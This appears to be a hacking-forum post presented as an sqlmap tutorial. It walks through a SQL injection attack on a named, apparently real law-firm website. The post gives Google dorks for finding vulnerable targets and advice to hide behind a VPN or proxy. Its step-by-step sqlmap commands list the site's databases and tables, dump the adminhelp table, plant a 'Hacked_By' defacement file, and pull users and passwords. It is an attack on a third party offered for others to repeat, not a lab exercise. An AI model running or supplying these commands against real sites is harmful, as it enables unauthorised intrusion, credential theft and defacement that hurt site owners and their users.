Telegram: | maintex |
VERIFIED
Join Date: Jun 2014
Posts: 168
![]() |
![]()
Hello All Members!
![]() Injection Tool: sqlmap Official Page: http://sqlmap.org Download Link: https://github.com/sqlmapproject/sqlmap/zipball/master Testing: WIndows XP/SP3 , Python 2.7.5 vulnerability Page: http://www.godwins-law.co.uk/staff.php?id=10' !!!!! Use OpenVPN OR PROXY !!!!! Step1. Target Google Dork: inurl:index.php , inurl:staff.php , inurl:show.php , inurl:login.php , etc... Target: http://www.godwins-law.co.uk/staff.php?id=10 Target WebServer Operating System: WIndows 2003 Target WebApplication: ASP.NET , Microsoft IIS 6.0 , PHP 5.2.8 Target BackEndDataBase: MySQL 5.0.0 Step2. DataBase sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql --dbs --database-- godwins information_schema Step3. Table sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql -D godwins --tables --table-- adminhelp articlecats articles contentimages imagelib news pages staff Step4. Column & Dump sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql -D godwins -T adminhelp --columns sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql -D godwins -T adminhelp --dump Step5. Hacked Text sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql --file-dest=Hacked_By_sasami_327.txt sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql --file-read=Hacked_By_sasami_327.txt Step6. user & password sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql --users --passwords |
![]() |
![]() |
![]() |
Tags |
sqlmap, tutorial |
Thread Tools | Search this Thread |
|
|